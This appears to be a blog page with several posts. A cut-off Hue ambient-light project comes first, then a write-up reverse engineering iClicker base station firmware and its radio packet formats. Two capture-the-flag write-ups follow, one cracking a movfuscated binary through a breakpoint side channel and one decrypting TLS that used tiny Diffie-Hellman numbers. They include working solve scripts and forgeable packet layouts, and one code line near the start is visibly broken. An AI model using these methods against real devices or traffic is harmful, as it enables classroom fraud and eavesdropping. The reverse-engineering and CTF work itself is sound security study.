void compute_average_pixel_value(YCbCrColor* average, int pitch, int height,
                                 unsigned char* data, int x, int y) {
    YCbCrColor total = { 0 };

    data += (y * pitch);
    for (int j = 0; j < EDGE_WIDTH; j++) {
        // Each data_u32 represents 2 pixels.
        const u32* data_u32 = (u32*) data;

        for (int i = x / 2; i < (x / 2) + EDGE_WIDTH / 2; i++) {
            // Two luma samples per word; the single Cr and Cb samples are
            // shared by both pixels, so they are counted twice.
            total.y  += data_u32[i] & 0xFF;
            total.cr += ((data_u32[i] >> 8) & 0xFF) * 2;
            total.y  += (data_u32[i] >> 16) & 0xFF;
            total.cb += ((data_u32[i] >> 24) & 0xFF) * 2;
        }

        data += pitch;
    }

    average->y = total.y / (EDGE_WIDTH * EDGE_WIDTH);
    average->cr = total.cr / (EDGE_WIDTH * EDGE_WIDTH);
    average->cb = total.cb / (EDGE_WIDTH * EDGE_WIDTH);
}

void perform_capture(CaptureStruct* cap) {
    cap->imageProvider->RenderTo(cap->imageProvider, cap->surface, NULL);

    void* data;
    int data_pitch;
    cap->surface->Lock(cap->surface, DSLF_READ, &data, &data_pitch);

            data_pitch, cap->height, data, 0, 0);


The only hiccup here was figuring out the exact YCbCr color encoding that the MStar uses, but that was again conveniently provided by the directfb source code.

Currently the code sends these averaged YCbCr colors of each corner to my laptop, which then shows them full-screen as a set of boxes for the Hue app to pick up:

After I clean up the code, I will open source it. In the future I’m hoping to integrate it directly with the Hue entertainment API so it can control the lights directly but for now, enjoy this demo. It runs at a stable 20-30 fps now so the effect looks great:

Reverse Engineering the iClicker Base Station

What are iClickers?

iClickers are used in a lot of colleges in order to conduct quizzes and take attendance. The whole ecosystem operates as follows:

  1. Each student buys an iClicker device. They’ve got some buttons on them to respond to multiple choice questions.

  2. They enter the unique ID on the back of the device into their school database.

  3. Each class is equipped with a base station that connects to the instructor’s computer via USB. With iClicker’s software, they can conduct quizzes and export the answers for automatic grading.

State of the art of iClicker reverse engineering

A significant amount of work has already been done on figuring out how the student-owned remotes work. The seminal work in this area is this fantastic paper by some students at the University of British Columbia, in which they dumped the firmware of the remote. Their key contributions were identifying the exact radio transceiver used in the device as well as the obfuscation scheme used when transmitting the IDs.

Following up on this, some students at Cornell started a project called iSkipper, where they attempted to create an open source alternative to the iClicker. By using logic analyzers and dumping the raw communications with a software defined radio, they were able to piece together the protocol that the remotes use to send their answers over the air. They wrote their own implementation of an iClicker that can be run on an Arduino with just a 900MHz radio transceiver.

While the iSkipper project has managed to figure out most of the iClicker protocol, one missing piece is the communication from the base station back to the remotes. Upon pressing a button, the base station sends back an acknowledgement packet to indicate that the answer has been accepted. In addition, the base station can also send a welcome message to the remotes to indicate what class is currently in progress.

In order to figure out this last missing piece of the iClicker puzzle, I set out to reverse engineer the receiver.

Acquiring the firmware

The first part of reverse engineering the base station would be to obtain the firmware that runs on it. Since I didn’t own a base station and didn’t want to buy one (you can get them for anywhere between $50-$100 on eBay), I had to figure out an alternative approach to acquiring the firmware.

Searching for iClicker base station firmware led me to the “iClicker Base Firmware Utility” on the iClicker downloads page. This software claimed to be able to update the firmware on a base station, so it seemed like a natural target. I initially guessed that they would package the updated firmware with the executable, but searching around in the distributed files I couldn’t locate any firmware files. Next, I tried running the executable.

“Check for Update”, interesting. This was a massive hint that the updates were most likely downloaded over the internet. Thus, I cracked open the executable in IDA and searched away for interesting URLs.

Aha! http://update.iclickergo.com/ic7files/iclicker/QA/.

Opening up this URL in a browser, I found that most of the files were updates to the firmware utility itself, but there were two very interesting files:

  • update_v0602.txt
  • U_BASEU_V0058.txt

Here is a chunk of update_v0602.txt:


For those unfamiliar, this is an Intel HEX file. Getting it into a binary format was as simple as:

objcopy -I ihex update_v0602.txt -O binary firmware.bin

and with that, I had the firmware in my hands without having to install a JTAG interface or an AVR programmer into a base station.
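For readers without binutils handy, the conversion can be sketched in a few lines of Python. This is a minimal reader that only handles data (type 00) and end-of-file (type 01) records and pads gaps with zero bytes; it is an illustration of the Intel HEX record layout, not a replacement for objcopy, and the function name is made up.

```python
def ihex_to_binary(text):
    """Flatten Intel HEX data records into one byte string.

    Each record is ':' + length + 16-bit address + type + data + checksum,
    all hex encoded. Extended addressing records are ignored in this sketch.
    """
    image = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if not line.startswith(":"):
            raise ValueError("not an Intel HEX record: %r" % line)
        record = bytes.fromhex(line[1:])
        # All bytes of a record, checksum included, sum to 0 modulo 256.
        if sum(record) & 0xFF != 0:
            raise ValueError("bad checksum in record: %r" % line)
        length = record[0]
        address = (record[1] << 8) | record[2]
        record_type = record[3]
        if record_type == 0x01:      # end-of-file record
            break
        if record_type != 0x00:      # skip anything that is not plain data
            continue
        end = address + length
        if len(image) < end:
            image.extend(bytes(end - len(image)))  # zero-fill any gap
        image[address:end] = record[4:4 + length]
    return bytes(image)


print(ihex_to_binary(":0400000001020304F2\n:00000001FF\n").hex())
```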

Reverse engineering the firmware

Alright, so next up we gotta disassemble the firmware. I strongly suspected that there was some Atmel chip inside the base station, just like the remote. Atmel makes some very popular programmable microcontrollers; a lot of embedded systems, IoT devices and the Arduino platform use Atmel chips.

Luckily IDA supports disassembling AVR, the architecture used by these microcontrollers. So I cracked the firmware open in IDA and went to hunt down the code that generates the acknowledgement packets.

Take the next section with a heavy grain of salt: this was my first time reverse engineering embedded software and it was very much new and uncharted territory for me. If I made any glaring mistakes, please feel free to reach out and I’ll try to amend them :)

ID Decoding

There was a lot of code and I wasn’t exactly familiar with AVR so in order to get my bearings, I set out to find a known piece of the protocol: the scrambling and de-scrambling routine for the iClicker remote ID. The iSkipper project had already figured out the algorithm to do this:

void iClickerEmulator::decodeId(uint8_t *id, uint8_t *ret) {
    ret[0] = (id[0] >> 3) | ((id[2] & 0x1) << 5) | ((id[1] & 0x1) << 6) | ((id[0] & 0x4) << 5);
    ret[1] = ((id[0] & 0x1) << 7) | (id[1] >> 1) | (id[2] >> 7);
    ret[2] = ((id[2] & 0x7c) << 1) | (id[3] >> 5);
    ret[3] = ret[0]^ret[1]^ret[2];
}
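As a quick sanity check, here is a Python port of that routine (the port and its name are mine, the bit operations are copied from the iSkipper code above). Feeding it the encoded ID used later in this post recovers the ID printed on the back of my remote.

```python
def decode_id(encoded):
    """Python port of iSkipper's decodeId; masks keep each result in one byte."""
    e0, e1, e2, e3 = encoded
    r0 = ((e0 >> 3) | ((e2 & 0x01) << 5) | ((e1 & 0x01) << 6) | ((e0 & 0x04) << 5)) & 0xFF
    r1 = (((e0 & 0x01) << 7) | (e1 >> 1) | (e2 >> 7)) & 0xFF
    r2 = (((e2 & 0x7C) << 1) | (e3 >> 5)) & 0xFF
    # The last byte of the ID is just the XOR of the first three.
    return bytes([r0, r1, r2, r0 ^ r1 ^ r2])


print(decode_id(bytes([0x14, 0x8C, 0x29, 0x70])).hex().upper())
```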

So a good place to start would be finding functions that do a lot of bit shifting. Searching for “lsr” (Logical Shift Right), I found a peculiar function:

  lsr     r30
  lsr     r30
  lsr     r30

In AVR, the lsr opcode shifts its argument register right by 1 bit. Three of them in a row looked an awful lot like the initial part of the decoding algorithm (id[0] >> 3), so I followed the cross references to the callers of this right_shift_3 function.

There were some cool tricks that the compiler used in this area. For example, in order to shift right by 7, it didn’t emit 7 lsr instructions. Instead, the sequence of instructions was:

swap    r30
andi    r30, 0xF
lsr     r30
lsr     r30
lsr     r30

The swap instruction swaps the two nibbles of the byte, so the higher order 4 bits get swapped with the lower order 4 bits. Performing an and with 0xF = 0b1111 after this essentially does the same thing as shifting right by 4. The three lsr instructions that follow bring the total shift to 7.
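The equivalence is easy to check exhaustively. The following Python snippet models the five-instruction sequence on an 8-bit value (the helper names are made up for this illustration) and compares it with a plain shift for every possible byte.

```python
def swap_nibbles(value):
    """Model of the AVR swap instruction on an 8-bit register."""
    return ((value << 4) | (value >> 4)) & 0xFF


def shift_right_7(value):
    """Model of: swap r30 / andi r30, 0xF / lsr r30 (three times)."""
    r30 = swap_nibbles(value)
    r30 &= 0x0F            # after this, r30 == value >> 4
    for _ in range(3):
        r30 >>= 1          # each lsr shifts right by one more bit
    return r30


print(all(shift_right_7(b) == b >> 7 for b in range(256)))
```

Five single-cycle instructions instead of seven is a small saving, but it adds up in code that shifts a lot.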

While this approach led me to the function that decodes the ID, the rest of the calling logic was not particularly easy to follow. I needed to find more landmarks in the code to figure out what was going on.

Radio SPI Interface

As mentioned in the introduction, previous reverse-engineers had already figured out what radio chip was used in the clicker, namely the Semtech XE1203F.

Consulting the datasheets for the IC, we can see that it uses a 3-wire SPI (Serial Peripheral Interface) based protocol in order to configure the radio chip. The next logical step was to look at an SPI tutorial for AVR microcontrollers. I found a great one here with the following code sample:

ldi r16,0xAA
out SPDR,r16         ; Initiate data transfer.
Wait:
sbis SPSR,SPIF       ; Wait for transmission to complete.
rjmp Wait
in r16,SPDR          ; The received data is placed in r16.

Perfect, so we have to look up usages of the SPDR register within the firmware. There was only one place that used this register, so I labelled the function as read_write_from_SPI. It reads one argument stored at (Y+1) and then writes it out the SPI port.

ROM:1393 read_write_from_SPI:                    ; CODE XREF: read_write_two_bytes_SPI
ROM:1393                 st      -Y, r16         ; Spill register r16
ROM:1394                 cli                     ; Disable interrupts
ROM:1395                 ldd     r30, Y+1
ROM:1396                 out     SPDR, r30       ; SPI Data Register
ROM:1397 loc_1397:                               ; CODE XREF: read_write_from_SPI+7
ROM:1397                 in      r30, SPSR       ; SPI Status Register
ROM:1398                 andi    r30, 0x80
ROM:1399                 cpi     r30, 0x80
ROM:139A                 brne    loc_1397

Here is one of the usages of the SPI writing function:

ROM:082A                 ldi     r30, 0xF
ROM:082B                 ldi     r31, 0x8A
ROM:082C                 st      -Y, r31
ROM:082D                 st      -Y, r30
ROM:082E                 call    read_write_two_bytes_SPI
ROM:0830                 ldi     r30, 0xA0
ROM:0831                 ldi     r31, 0x8B
ROM:0832                 st      -Y, r31
ROM:0833                 st      -Y, r30
ROM:0834                 call    read_write_two_bytes_SPI

Now if we consult with the XE1203F’s documentation, it mentions the following:

The timing diagram of a write sequence is illustrated in Figure 12 below. The sequence is initiated when a Start condition is detected, defined by the SI signal being set to “0” during one period of SCK. The next bit is a read/write (R/W) bit which should be “0” to indicate a write operation. The next 5 bits contain the address of the configuration/status registers A[4:0] to be accessed, MSB first (see 5.2). Then, the next 8 bits contain the data to be written into the register. The sequence ends with 2 stop bits set to “1”.

Okay cool, now if we take a closer look at the bytes being written out on the SPI interface as binary, we see the following:

0x8A          0xF

1000 1010   0000 1111

Compare this against the timing diagram from the datasheet above, looks fairly similar! If we plot it out and label the bits, we see the following:

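Great, so this is code that is writing a value to a configuration register in the radio chip. Reading the 16 bits from left to right: a leading 1, the start bit (0), the R/W bit (0 for a write), the five address bits 01010 and finally the eight data bits 0000 1111. So it’s writing the value 0x0F to the register at address 0b01010. I confirmed this theory by decoding a few more SPI writes.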

Register   Value   Description
0b01010    0x0F    Frequency Adjustment MSB
0b01011    0xA0    Frequency Adjustment LSB
0b00010    0x1F    Frequency Band 902–928 MHz
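Decoding these by hand gets tedious, so here is a small Python helper for splitting a two-byte SPI write into its fields. The bit positions are my reading of the two writes shown in the disassembly (a leading 1, then start, R/W, 5 address bits and 8 data bits); the function name and dictionary keys are made up for this sketch.

```python
def decode_spi_write(high, low):
    """Split the 16 bits passed to read_write_two_bytes_SPI into fields."""
    word = (high << 8) | low
    return {
        "start": (word >> 14) & 1,       # 0 marks the start condition
        "rw": (word >> 13) & 1,          # 0 means write
        "address": (word >> 8) & 0x1F,   # A[4:0], MSB first
        "data": word & 0xFF,
    }


for high, low in [(0x8A, 0x0F), (0x8B, 0xA0)]:
    fields = decode_spi_write(high, low)
    print("address 0b{:05b} <- 0x{:02X}".format(fields["address"], fields["data"]))
```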

Following the formula in the datasheet, the final frequency is the base frequency plus 500 Hz times the value of the frequency adjustment registers, interpreted as a 16-bit two’s complement number.

Frequency Base = 915 MHz
Frequency Adjustment = 0x0FA0 = 4000

Final Frequency = (915 MHz) + (4000 * 500 Hz)
                = 915 MHz + 2 MHz
                = 917 MHz

and if we check this against the first paper linked above, we can confirm that they experimentally figured out the default AA channel operates at 917.0 MHz.
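The same arithmetic as a tiny Python function, in case you want to decode other channels. The 915 MHz base and 500 Hz step are the values used in the calculation above; the function name and defaults are just for this sketch.

```python
def carrier_frequency_hz(msb, lsb, base_hz=915_000_000, step_hz=500):
    """Combine the two adjustment registers into the carrier frequency."""
    raw = (msb << 8) | lsb
    if raw & 0x8000:          # interpret as 16-bit two's complement
        raw -= 0x10000
    return base_hz + raw * step_hz


print(carrier_frequency_hz(0x0F, 0xA0))
```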

Great, this discovery let me figure out exactly what parameters the radio module is using and helped me find the portion of the code responsible for changing frequencies.

Radio Data IO

So the SPI protocol is how the radio module is configured, but looking at the data sheet we can see that there is a separate DATAIN and DATA port used to read and write actual radio packets. My first intuition was that the firmware might be making use of the AVR USART (Universal Synchronous/Asynchronous Receiver/Transmitter) feature to exchange data with the radio chip.

However, after looking at the interrupt handlers for USART_RXC and USART_TXC which correspond to when a byte is sent or received by the USART module, it seemed clear that this is actually how the base station communicates with the instructor’s computer and NOT where radio messages were read/sent.

Within AVR, IO is primarily done using the in and out instructions. The only interesting uses I could find of the in instruction were in the INT1 interrupt handler, which corresponds to a configurable external interrupt. The following is pseudo-C code that corresponds to the handler:

int8_t radio_bytes_read = 0;

int8_t radio_bits_to_read = 8;
int8_t radio_bytes_to_read = n;

extern int8_t* radio_bytes;

void INT1() {
    while (radio_bytes_to_read > 0) {
        while (radio_bits_to_read > 0) {
            int8_t current_byte = radio_bytes[radio_bytes_read];

            if (PIND_5 is high) {
                current_byte |= 1;
            }
            current_byte = current_byte << 1;

            radio_bytes[radio_bytes_read] = current_byte;
        }
        radio_bits_to_read = 8;
    }
}

And bingo, now that we know where the radio_bytes array is in memory, we can look at cross references to it to find the code that processes packets sent over the radio.

Dynamic analysis

After spending a lot of time just statically analyzing the disassembled code, I decided to use the fantastic simavr project, which allows you to run AVR binaries and even attach gdb to them.

I took the example code in examples/board_simduino/simduino.c and customized it to my needs. The first and most obvious change was to set the MMCU to atmega16.

Next up was setting the appropriate bit and raising the external interrupts to emulate the radio module receiving bytes.

// Clock one byte into the simulated firmware, most significant bit first.
void send_byte(unsigned char b, avr_irq_t* radio_in, avr_extint_t* extint, avr_t* avr) {
    for (int i = 7; i >= 0; i--) {
        // Let the simulated CPU run for a while between bits (loop body assumed).
        for (int j = 0; j < 200000; j++) {
            avr_run(avr);
        }

        int bit = (b >> i) & 1;
        printf("Writing bit %d\n", bit);
        // Set the data pin, then raise INT1 so the firmware samples it.
        avr_raise_irq(radio_in, bit);
        avr_raise_interrupt(avr, &extint->eint[1].vector);
    }
}

int main(int argc, char** argv) {
    // The simavr setup of avr, radio_in and extint is omitted here.
    int interrupted = 0;

    while (1) {
        int state = avr_run(avr);
        if ( state == cpu_Done || state == cpu_Crashed) {
            break;
        }

        // divide by 2 to get "word" addresses like IDA uses
        unsigned int curr_pc = avr->pc / 2;
        if (curr_pc == 0x18E && !interrupted) {
            // Perform an INT0 interrupt
            avr_raise_interrupt(avr, &extint->eint[0].vector);
            printf("Raising AVR INT0 interrupt\n");

            // Raw ID = 0xA2 0x46 0x53 0xB7
            // My encoded ID = 0x14 0x8C 0x29 0x70
            send_byte(0x14, radio_in, extint, avr);
            send_byte(0x8C, radio_in, extint, avr);
            send_byte(0x29, radio_in, extint, avr);
            // Sending an answer of 'B' (0x05)
            unsigned char last_id = 0x70;
            last_id &= 0xF0;
            last_id |= 0x05;
            send_byte(last_id, radio_in, extint, avr);

            // compute the checksum
            unsigned char checksum = 0x14 + 0x8C + 0x29 + last_id;
            send_byte(checksum, radio_in, extint, avr);

            interrupted = 1;
        }
    }
}
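For reference, the five bytes fed to the simulated firmware above can be reproduced with a few lines of Python. This only mirrors what the harness sends (encoded ID with the answer in the low nibble of the last byte, followed by an 8-bit sum); the function names are made up for this sketch.

```python
def build_answer_packet(encoded_id, answer_code):
    """Encoded ID with the answer in the low nibble, plus an 8-bit checksum."""
    body = bytearray(encoded_id)
    body[3] = (body[3] & 0xF0) | (answer_code & 0x0F)
    checksum = sum(body) & 0xFF   # same wrap-around as the unsigned char in C
    return bytes(body) + bytes([checksum])


def bits_msb_first(byte):
    """The order in which send_byte clocks out the bits of one byte."""
    return [(byte >> i) & 1 for i in range(7, -1, -1)]


packet = build_answer_packet(bytes([0x14, 0x8C, 0x29, 0x70]), 0x05)
print(packet.hex(" "))
print(bits_msb_first(packet[0]))
```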

Protocol Findings

Hopefully the last section gave you some insight into what the reverse engineering process was like. Not to harp on it too much, let’s move on to the actual findings in terms of the radio protocol:

Welcome ping packet

The base station sends out this packet at regular intervals (every few seconds). It contains the welcome message as shown on the iClicker like this:

as well as the question mode being used, which can be the standard A/B/C/D/E multiple choice mode, numeric, alphanumeric or a sequence of questions.

Packet details

Byte    Description
0-5     Fixed header (radio sync bytes): 0x55 0x55 0x55 0x36 0x36 0x36
6-13    Welcome message (note this is not ASCII, see below)
14      Mode byte 1
15-16   Number of questions (for multiple question modes)
17      Mode byte 2
18      Checksum (sum of bytes 6-17)

The mode bytes are as follows:

Mode                    Mode Byte 1   Mode Byte 2
Multiple Choice         0x92          0x62
Numeric Mode            0x93          0x63
Alphanumeric Mode       0x9B          0x6B
Multiple Numeric        0x94          0x64
Multiple Alphanumeric   0x9C          0x6C

Here are some examples of welcome packets.

This causes the iClicker to show IREVERSE on screen and puts it in the multiple choice mode.

0    1    2    3    4    5    6    7    8    9    10   11   12   13   14   15   16   17   18
0x55 0x55 0x55 0x36 0x36 0x36 0x93 0x9C 0x8F 0xA0 0x8F 0x9C 0x9D 0x8F 0x92 0xAA 0xAA 0x62 0xFD
 ^-------------------------^  ^---------- Welcome Message ----------^  ^   ^-------^  ^    ^
  Header/Radio sync bytes     'I'  'R'  'E'  'V'  'E'  'R'  'S'  'E'   │    Useless   |  Checksum
                                                                       │              |
                                                      Question Mode (Multiple Choice) ┙

This causes the iClicker to show 2+2=5 on screen and allows 8 questions to be answered in alphanumeric mode.

0    1    2    3    4    5    6    7    8    9    10   11   12   13   14   15   16   17   18
0x55 0x55 0x55 0x36 0x36 0x36 0x82 0xA6 0x82 0xA7 0x85 0x00 0x00 0x00 0x9C 0x08 0x00 0x6C 0xE6
 ^-------------------------^  ^---------- Welcome Message ----------^  ^   ^-------^  ^    ^
  Header/Radio sync bytes     '2'  '+'  '2'  '='  '5'  ' '  ' '  ' '   │  8 in little |  Checksum
                                                                       │    endian    |
                                                                       |              |
                                                Question Mode (Multiple Alphanumeric) ┙
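Both example packets can be checked against the checksum rule from the table. The snippet below is a small Python sketch (the function name is made up) that sums bytes 6-17 and keeps the low 8 bits, since the checksum has to fit in a single byte.

```python
def welcome_checksum(packet):
    """Low byte of the sum of bytes 6-17 of a 19-byte welcome packet."""
    if len(packet) != 19:
        raise ValueError("welcome packets are 19 bytes long")
    return sum(packet[6:18]) & 0xFF


ireverse = bytes([0x55, 0x55, 0x55, 0x36, 0x36, 0x36,
                  0x93, 0x9C, 0x8F, 0xA0, 0x8F, 0x9C, 0x9D, 0x8F,
                  0x92, 0xAA, 0xAA, 0x62, 0xFD])
two_plus_two = bytes([0x55, 0x55, 0x55, 0x36, 0x36, 0x36,
                      0x82, 0xA6, 0x82, 0xA7, 0x85, 0x00, 0x00, 0x00,
                      0x9C, 0x08, 0x00, 0x6C, 0xE6])

for packet in (ireverse, two_plus_two):
    print(hex(welcome_checksum(packet)), hex(packet[18]))
```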

Text encoding

As mentioned earlier, the welcome message doesn’t use a normal encoding like ASCII; it seems to be custom rolled.

  • 1 to 9 are from 0x81 to 0x89.

  • 0 is represented by 0x8A.

  • A starts at 0x8B and goes up sequentially like ASCII.

  • - is 0xA5.

  • + is 0xA6.

  • = is 0xA7.

  • ? is 0xA8.

  • _ is 0xA9.

  • Any other bytes will show a blank.
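The rules above translate into a short Python encoder. This is a sketch under a few assumptions of mine: letters are treated as uppercase only, unknown characters are sent as 0x00 (one of the bytes that shows up blank, as in the 2+2=5 example), and messages are padded or cut to the 8 bytes available in the packet.

```python
SYMBOLS = {"-": 0xA5, "+": 0xA6, "=": 0xA7, "?": 0xA8, "_": 0xA9}


def encode_char(ch):
    """Map one character to its iClicker display byte."""
    if "1" <= ch <= "9":
        return 0x81 + (ord(ch) - ord("1"))
    if ch == "0":
        return 0x8A
    if "A" <= ch <= "Z":
        return 0x8B + (ord(ch) - ord("A"))
    return SYMBOLS.get(ch, 0x00)   # anything else is shown as a blank


def encode_welcome(text):
    """Encode a message into the 8 welcome-message bytes."""
    padded = text.upper()[:8].ljust(8)
    return bytes(encode_char(ch) for ch in padded)


print(encode_welcome("IREVERSE").hex(" "))
print(encode_welcome("2+2=5").hex(" "))
```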

Multiple choice answer ACK packet

Sent to acknowledge an answer for a multiple choice question. These involve calculations on the encoded iClicker id, which I will refer to as an array called encodedId.


(Shows a tick on the iClicker screen)

Bytes   Description
0-2     Fixed header (radio sync bytes): 0x55 0x55 0x55
3       Byte 0 of the encoded iClicker ID (encodedId[0])
4       Byte 1 of the encoded iClicker ID (encodedId[1])
5       Bitwise negation of byte 2 of the ID (~encodedId[2])
6       (encodedId[3] & 0xF0) | 0x02
7       Constant 0x22


(Shows closed on the iClicker screen)

Bytes   Description
0-2     Fixed header (radio sync bytes): 0x55 0x55 0x55
3       Byte 0 of the encoded iClicker ID (encodedId[0])
4       Byte 1 of the encoded iClicker ID (encodedId[1])
5       Bitwise negation of byte 2 of the ID (~encodedId[2])
6       (encodedId[3] & 0xF0) | 0x06
7       Constant 0x66


My iClicker ID is A24653B7, which encodes to 0x14 0x8C 0x29 0x75 when answering B.

Let’s calculate the bitwise negation of my encodedId[2]:

 0x29 = 0b00101001
~0x29 = 0b11010110 = 0xD6

Thus, a positive acknowledgement packet for this answer would be:

0x55 0x55 0x55  0x14 0x8C 0xD6 0x72 0x22

And a negative acknowledgement packet would be:

0x55 0x55 0x55  0x14 0x8C 0xD6 0x76 0x66
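Putting the two tables together, both acknowledgement packets can be generated from the encoded answer with a few lines of Python. The function and constant names are made up for this sketch; the byte layout is the one documented above.

```python
SYNC = bytes([0x55, 0x55, 0x55])


def build_ack(encoded_id, accepted):
    """Build the multiple choice ACK for a 4-byte encoded iClicker ID."""
    flag, trailer = (0x02, 0x22) if accepted else (0x06, 0x66)
    return SYNC + bytes([
        encoded_id[0],
        encoded_id[1],
        ~encoded_id[2] & 0xFF,            # bitwise negation, kept to one byte
        (encoded_id[3] & 0xF0) | flag,
        trailer,
    ])


answer_b = bytes([0x14, 0x8C, 0x29, 0x75])
print(build_ack(answer_b, accepted=True).hex(" "))
print(build_ack(answer_b, accepted=False).hex(" "))
```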

Side note: I haven’t documented the ACK packets for other question modes since I figured there’s not a lot of interest in those. Please let me know if you’d like to see them.


This was my first time reverse engineering a large real-world project, especially in the embedded space. Compared to reverse engineering x86, a bigger chunk of time was spent reading datasheets for the hardware components, especially the Atmel processor. The lack of strings, system calls etc. also makes it a lot harder to orient yourself and find your way around the code.

I’ve posted my IDA database and a text dump of the firmware on Github. Feel free to reach out to me if you have any questions.

Problem Description

Deep on the web, I discovered a secret key validation. It appeared to be from the future, and it only had one sentence: “Risk speed for security”. Something seems fishy, you should try to break the key and find the secret inside!


The binary

Welp, this binary was movfuscated:

08048794 <check_element>:
 8048794:	a1 88 d2 3f 08       	mov    eax,ds:0x83fd288
 8048799:	ba 94 87 04 88       	mov    edx,0x88048794
 804879e:	a3 10 d1 1f 08       	mov    ds:0x81fd110,eax
 80487a3:	89 15 14 d1 1f 08    	mov    DWORD PTR ds:0x81fd114,edx
 80487a9:	b8 00 00 00 00       	mov    eax,0x0
 80487ae:	b9 00 00 00 00       	mov    ecx,0x0
 80487b3:	ba 00 00 00 00       	mov    edx,0x0
 80487b8:	a0 10 d1 1f 08       	mov    al,ds:0x81fd110
 80487bd:	8b 0c 85 20 77 05 08 	mov    ecx,DWORD PTR [eax*4+0x8057720]
 80487c4:	8a 15 14 d1 1f 08    	mov    dl,BYTE PTR ds:0x81fd114
 80487ca:	8a 14 11             	mov    dl,BYTE PTR [ecx+edx*1]
 80487cd:	89 15 00 d1 1f 08    	mov    DWORD PTR ds:0x81fd100,edx
 80487d3:	a0 11 d1 1f 08       	mov    al,ds:0x81fd111
 80487d8:	8b 0c 85 20 77 05 08 	mov    ecx,DWORD PTR [eax*4+0x8057720]
 80487df:	8a 15 15 d1 1f 08    	mov    dl,BYTE PTR ds:0x81fd115
 80487e5:	8a 14 11             	mov    dl,BYTE PTR [ecx+edx*1]
 80487e8:	89 15 04 d1 1f 08    	mov    DWORD PTR ds:0x81fd104,edx
 80487ee:	a0 12 d1 1f 08       	mov    al,ds:0x81fd112
 80487f3:	8b 0c 85 20 77 05 08 	mov    ecx,DWORD PTR [eax*4+0x8057720]
 80487fa:	8a 15 16 d1 1f 08    	mov    dl,BYTE PTR ds:0x81fd116

Initially we tried using demovfuscator, but all it really did was turn a few movs into leas, which wasn’t too useful.

Instead, we used demovfuscator’s -g option to generate the control flow graph of the program which looked like this:

movfuscator control flow graph

Since the program was exiting on a wrong input, I decided to experiment by adding a breakpoint at the first branch and taking a look around in gdb. This breakpoint was being hit thousands of times, so I used ignore <bp> 1000000 to quickly count the hits, which resulted in a really interesting output:

[Inferior 1 (process 24054) exited with code 01]
pwndbg> i breakpoints
Num     Type           Disp Enb Address    What
2       breakpoint     keep y   0x0805262f <main+8901>
    breakpoint already hit 6018 times

[Inferior 1 (process 24082) exited with code 01]
pwndbg> i breakpoint
Num     Type           Disp Enb Address    What
3       breakpoint     keep y   0x0805262f <main+8901>
    breakpoint already hit 4012 times

Notice that when correct input is provided, the breakpoint is hit more often. Now that we have an indicator to know that one character of input is correct, we can go ahead and exploit this to recover the flag.

(Note: handle SIGSEGV nostop noprint pass and handle SIGILL nostop noprint pass are required to debug in gdb since movfuscator uses signal handlers on SIGSEGV and SIGILL for function calls and loops)

Exploiting the side channel

We whipped up a quick gdb script to automate the process of monitoring the breakpoints:

import gdb
import string

valid_chars = string.printable

gdb.execute("file future_fun")
gdb.execute("handle SIGSEGV nostop noprint pass")
gdb.execute("handle SIGILL nostop noprint pass")

class MyBreakpoint(gdb.Breakpoint):
    def stop(self):
        return False

bp = MyBreakpoint("*0x805262f")
bp.ignore_count = 90000000

flag = ""
while not flag.endswith("}"):
    for char in valid_chars:
        bp.hit_count = 0

        newflag = flag + char

        with open("flagfile", "w") as f:
            f.write(newflag + "%")

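        exec_command = 'r < flagfile > /dev/null'
        gdb.write("Trying: " + newflag + "\n")
        # Actually run the binary with this candidate as input.
        gdb.execute(exec_command)

        if bp.hit_count > (len(newflag) + 1) * 1000:
            gdb.write("[!] Found character: " + newflag + "\n")
            flag = newflag
            gdb.write("Hits: {}\n".format(bp.hit_count))
            # Start over with the full character set for the next position.
            break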

This script tries each printable character and if we hit the breakpoint a thousand times more than the last, we know it was correct.

After running for a few minutes, the flag was recovered successfully.

Recovery in progress

Problem Description

Ever since their hella successful ICO, the crypto experts at VapeCoinIO have put developers first with their simple, intuitive, and, most importantly, secure API. Once you’ve created your account and set up your wallet, you can access it programmatically using your VapeID by sending a GET request to /api/login?key=<HASH> where <HASH> is your VapeID. Your wallet is transferred to you over TLS, so don’t worry—it’s really, really secure. In fact, it’s so secure that the founder and CEO of VapeCoinIO uses the API for his personal Brainwallet.

One of your contacts is a site-reliability engineer at VapeCoinIO. He has obtained a PCAP of a TLS session with a client originating from an IP he suspects to be used by CEO’s personal laptop. Perhaps he accessed his wallet! Can you find a way to recover its contents?


Inspecting the packet capture

As the problem description says, the first thing we notice in the PCAP is that the data is transferred exclusively over a TLS connection. Thus the first thing we need to look for is something amiss in the TLS exchange such as the use of a weak cipher.

We can see in the PCAP that the TLS connection is using: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256

DHE stands for “Diffie-Hellman ephemeral”: every TLS session uses a fresh set of Diffie-Hellman public numbers, and the server’s RSA key is used to sign its Diffie-Hellman public number to provide authenticity.

Looking at the Diffie-Hellman numbers in Wireshark, we notice something very interesting:

Wireshark Dissection TLS Exchange

Those numbers look absolutely tiny! Diffie-Hellman’s security is based on the difficulty of the discrete logarithm problem. Ordinarily the p (prime) for DH is a 2048-bit number; here it’s an abysmal 32 bits, making it trivial to compute discrete logarithms. SageMath has several algorithms built in to compute discrete logs, so we wrote up a quick script to recover the client’s secret number.

p = 0xf661398b
g = 0x02
client_public = 0x42b2769b
server_public = 0x916ddb94

k = GF(p)
client_secret = discrete_log_lambda(k(client_public), k(g), (1,2**32))
# 0x5ec3d070

The client secret is then enough to compute the shared secret. This is known as the pre-master secret in TLS terms, and it is all Wireshark needs to decrypt the TLS traffic.

premaster_secret = pow(server_public, client_secret, p)
# 0xf5ca9f85
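If you don’t have SageMath installed, a 32-bit modulus is small enough for a plain Python baby-step giant-step search. This is a swapped-in technique for illustration, not the lambda method Sage used above, and the function name is made up. It needs roughly sqrt(p) table entries (about 64,000 here) and Python 3.8+ for the negative exponent in pow.

```python
from math import isqrt


def discrete_log_bsgs(base, target, modulus):
    """Find x with pow(base, x, modulus) == target using baby-step giant-step."""
    m = isqrt(modulus) + 1
    # Baby steps: remember base^j for every j below m.
    baby = {}
    value = 1
    for j in range(m):
        baby.setdefault(value, j)
        value = value * base % modulus
    # Giant steps: strip off base^m until we land on a baby step.
    step = pow(base, -m, modulus)
    gamma = target % modulus
    for i in range(m):
        if gamma in baby:
            return i * m + baby[gamma]
        gamma = gamma * step % modulus
    raise ValueError("no discrete log found")


p = 0xf661398b
g = 0x02
client_public = 0x42b2769b
server_public = 0x916ddb94

client_secret = discrete_log_bsgs(g, client_public, p)
print(hex(client_secret), hex(pow(server_public, client_secret, p)))
```

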